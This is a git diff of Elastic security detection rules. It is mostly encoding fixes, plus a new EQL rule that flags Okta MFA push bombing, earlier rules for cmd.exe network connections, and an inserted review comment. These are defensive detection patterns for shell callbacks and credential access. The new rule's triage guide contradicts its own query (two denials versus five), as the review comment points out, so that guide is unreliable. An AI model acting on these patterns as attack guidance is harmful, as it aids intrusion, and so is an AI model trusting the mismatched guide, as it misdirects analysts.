services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, 
service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and file name conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"cmd.exe\" and event.type == \"start\"]\n [network where host.os.type == \"windows\" and process.name : \"cmd.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\",\n \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\",\n \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\")]\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_102.json b/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_102.json index cb54a28613c..8bdab52a612 100644 --- a/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_102.json 
+++ b/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_102.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_103.json b/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_103.json index 63672ca7e91..a75848da106 100644 --- a/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_103.json +++ b/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_103.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_104.json b/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_104.json index 21425394e18..5b4a3fca538 100644 --- a/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_104.json +++ b/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_104.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_105.json b/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_105.json index 89c7ecaf766..5c5f4c11f83 100644 --- a/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_105.json +++ b/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_105.json 
@@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_1.json b/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_1.json index 799c8b149f3..e91af52a5cc 100644 --- a/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_1.json +++ b/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_1.json @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_2.json b/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_2.json index fe1d887f7c8..2dc8fba4fb9 100644 --- a/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_2.json +++ b/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_2.json @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -95,7 +95,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_3.json b/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_3.json index 9088e9933ef..86b17c4c93b 100644 
--- a/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_3.json +++ b/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_3.json @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -96,7 +96,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_4.json b/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_4.json index 515f22170cf..187cc522f88 100644 --- a/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_4.json +++ b/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_4.json @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -96,7 +96,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/8a0fbd26-867f-11ee-947c-f661ea17fbcd_1.json b/packages/security_detection_engine/kibana/security_rule/8a0fbd26-867f-11ee-947c-f661ea17fbcd_1.json index 7ab5d9f0381..d1d23996265 100644 --- a/packages/security_detection_engine/kibana/security_rule/8a0fbd26-867f-11ee-947c-f661ea17fbcd_1.json +++ b/packages/security_detection_engine/kibana/security_rule/8a0fbd26-867f-11ee-947c-f661ea17fbcd_1.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", 
diff --git a/packages/security_detection_engine/kibana/security_rule/8a0fbd26-867f-11ee-947c-f661ea17fbcd_2.json b/packages/security_detection_engine/kibana/security_rule/8a0fbd26-867f-11ee-947c-f661ea17fbcd_2.json
new file mode 100644
index 00000000000..3961a32e386
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/8a0fbd26-867f-11ee-947c-f661ea17fbcd_2.json
@@ -0,0 +1,82 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Detects when an attacker abuses the Multi-Factor authentication mechanism by repeatedly issuing login requests until the user eventually accepts the Okta push notification. An adversary may attempt to bypass the Okta MFA policies configured for an organization to obtain unauthorized access.",
+ "event_category_override": "event.category",
+ "index": [
+ "filebeat-*",
+ "logs-okta*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Potential Okta MFA Bombing via Push Notifications",
+ "note": "## Triage and analysis\n\n### Investigating Potential Okta MFA Bombing via Push Notifications\n\nMulti-Factor Authentication (MFA) is an effective method to prevent unauthorized access. However, some adversaries may abuse the system by repeatedly sending MFA push notifications until the user unwittingly approves the access.\n\nThis rule detects when a user denies MFA Okta Verify push notifications twice, followed by a successful authentication event within a 10-minute window. This sequence could indicate an adversary's attempt to bypass the Okta MFA policy.\n\n#### Possible investigation steps:\n\n- Identify the user who received the MFA notifications by reviewing the `user.email` field.\n- Identify the time, source IP, and geographical location of the MFA requests and the subsequent successful login.\n- Review the `event.action` field to understand the nature of the events. It should include two `user.mfa.okta_verify.deny_push` actions and one `user.authentication.sso` action.\n- Ask the user if they remember receiving the MFA notifications and subsequently logging into their account.\n- Check if the MFA requests and the successful login occurred during the user's regular activity hours.\n- Look for any other suspicious activity on the account around the same time.\n- Identify whether the same pattern is repeated for other users in your organization. Multiple users receiving push notifications simultaneously might indicate a larger attack.\n\n### False positive analysis:\n\n- Determine if the MFA push notifications were legitimate. Sometimes, users accidentally trigger MFA requests or deny them unintentionally and later approve them.\n- Check if there are known issues with the MFA system causing false denials.\n\n### Response and remediation:\n\n- If unauthorized access is confirmed, initiate your incident response process.\n- Alert the user and your IT department immediately.\n- If possible, isolate the user's account until the issue is resolved.\n- Investigate the source of the unauthorized access.\n- If the account was accessed by an unauthorized party, determine the actions they took after logging in.\n- Consider enhancing your MFA policy to prevent such incidents in the future.\n- Encourage users to report any unexpected MFA notifications immediately.\n- Review and update your incident response plans and security policies based on the findings from the incident.\n",
+ "query": "sequence by okta.actor.id with maxspan=10m\n [authentication where event.dataset == \"okta.system\"\n and okta.event_type == \"user.mfa.okta_verify.deny_push\"] with runs=5\n until [authentication where event.dataset == \"okta.system\"\n and (okta.event_type: (\n \"user.authentication.sso\",\n \"user.authentication.auth_via_mfa\",\n \"user.authentication.verify\",\n \"user.session.start\") and okta.outcome.result == \"SUCCESS\")]\n",
+ "references": [
+ "https://www.mandiant.com/resources/russian-targeting-gov-business",
+ "https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy",
+ "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection",
+ "https://www.rezonate.io/blog/okta-logs-decoded-unveiling-identity-threats-through-threat-hunting/"
+ ],
+ "related_integrations": [
+ {
+ "package": "okta",
+ "version": "^2.0.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "okta.actor.id",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "okta.event_type",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "okta.outcome.result",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 73,
+ "rule_id": "8a0fbd26-867f-11ee-947c-f661ea17fbcd",
+ "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n",
+ "severity": "high",
+ "tags": [
+ "Use Case: Identity and Access Audit",
+ "Tactic: Credential Access",
+ "Data Source: Okta"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0006",
+ "name": "Credential Access",
+ "reference": "https://attack.mitre.org/tactics/TA0006/"
+ },
+ "technique": [
+ {
+ "id": "T1621",
+ "name": "Multi-Factor Authentication Request Generation",
+ "reference": "https://attack.mitre.org/techniques/T1621/"
+ }
+ ]
+ }
+ ],
+ "type": "eql",
+ "version": 2
+ },
+ "id": "8a0fbd26-867f-11ee-947c-f661ea17fbcd_2",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/8a1b0278-0f9a-487d-96bd-d4833298e87a_101.json b/packages/security_detection_engine/kibana/security_rule/8a1b0278-0f9a-487d-96bd-d4833298e87a_101.json
index b2ecf1fc7c7..3e33e7d87dc 100644
--- a/packages/security_detection_engine/kibana/security_rule/8a1b0278-0f9a-487d-96bd-d4833298e87a_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/8a1b0278-0f9a-487d-96bd-d4833298e87a_101.json
@@ -28,7 +28,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -50,7 +50,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
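Review bot: The investigation guide in the new `note` string contradicts the `query` in the same file: the guide says the rule fires when a user denies push notifications "twice" and that `event.action` should show "two `user.mfa.okta_verify.deny_push` actions and one `user.authentication.sso` action", whereas the query requires `with runs=5` on `okta.event_type` and accepts any of four success event types. An analyst triaging from the guide will look for the wrong counts and the wrong field; suggest rewording those two sentences to "denies MFA Okta Verify push notifications five times" and "five `user.mfa.okta_verify.deny_push` events in `okta.event_type` followed by one successful `user.authentication.sso`, `user.authentication.auth_via_mfa`, `user.authentication.verify` or `user.session.start` event". Separately, if I read EQL's `until` correctly it is an expiration condition rather than a required final stage, so this sequence would complete on five denials within the 10-minute window whether or not a successful authentication follows, and a success arriving between denials would cancel the match; if the behaviour stated in `description` and the guide (denials followed by a successful login) is what should alert, the success event belongs in a second `[ ... ]` sequence stage rather than after `until` — worth confirming against the EQL sequence docs before this version ships.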
diff --git a/packages/security_detection_engine/kibana/security_rule/8a1b0278-0f9a-487d-96bd-d4833298e87a_102.json b/packages/security_detection_engine/kibana/security_rule/8a1b0278-0f9a-487d-96bd-d4833298e87a_102.json index 0d5f9759e7d..fef6e4c184f 100644 --- a/packages/security_detection_engine/kibana/security_rule/8a1b0278-0f9a-487d-96bd-d4833298e87a_102.json +++ b/packages/security_detection_engine/kibana/security_rule/8a1b0278-0f9a-487d-96bd-d4833298e87a_102.json @@ -27,7 +27,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -49,7 +49,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/8a1b0278-0f9a-487d-96bd-d4833298e87a_103.json b/packages/security_detection_engine/kibana/security_rule/8a1b0278-0f9a-487d-96bd-d4833298e87a_103.json index d4cd8b02e1c..499aaa66245 100644 --- a/packages/security_detection_engine/kibana/security_rule/8a1b0278-0f9a-487d-96bd-d4833298e87a_103.json +++ b/packages/security_detection_engine/kibana/security_rule/8a1b0278-0f9a-487d-96bd-d4833298e87a_103.json @@ -28,7 +28,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -50,7 +50,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_102.json b/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_102.json index 3c7f66c90e1..72cd381c356 100644 --- a/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_102.json 
+++ b/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_102.json @@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "8a1d4831-3ce6-4859-9891-28931fa6101d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -106,7 +106,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_103.json b/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_103.json index d7e03c66d24..b38ab0fbcc2 100644 --- a/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_103.json +++ b/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_103.json 
@@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "8a1d4831-3ce6-4859-9891-28931fa6101d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -105,7 +105,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_104.json b/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_104.json index c0c4222900e..d21be27df20 100644 --- a/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_104.json +++ b/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_104.json 
@@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "8a1d4831-3ce6-4859-9891-28931fa6101d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -106,7 +106,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_105.json b/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_105.json index d454178adf1..8207c21451d 100644 --- a/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_105.json +++ b/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_105.json 
@@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "8a1d4831-3ce6-4859-9891-28931fa6101d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -107,7 +107,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_106.json b/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_106.json index 3100dc29fcd..fef6704c195 100644 --- a/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_106.json +++ b/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_106.json 
@@ -62,7 +62,7 @@ ], "risk_score": 47, "rule_id": "8a1d4831-3ce6-4859-9891-28931fa6101d", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -106,7 +106,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_102.json b/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_102.json index 23ad6fd3628..e6e6693e1ec 100644 --- a/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_102.json +++ b/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_102.json 
@@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_103.json b/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_103.json index 163f111530c..ab1c54ff8e1 100644 --- a/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_103.json +++ b/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_103.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_104.json b/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_104.json index c8f51afcf83..b1ec39b4790 100644 --- a/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_104.json +++ b/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_104.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_105.json b/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_105.json index c94da23e68b..4f0baa6dd51 100644 --- a/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_105.json +++ b/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_105.json 
@@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_206.json b/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_206.json index 0598116ce4e..eaeb2b19e61 100644 --- a/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_206.json +++ b/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_206.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_103.json b/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_103.json index bf510cc8096..0a463eb8e7e 100644 --- a/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_103.json +++ b/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_103.json 
@@ -46,7 +46,7 @@ ], "risk_score": 47, "rule_id": "8acb7614-1d92-4359-bfcf-478b6d9de150", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_104.json b/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_104.json index e064e930388..53e9d7dc511 100644 --- 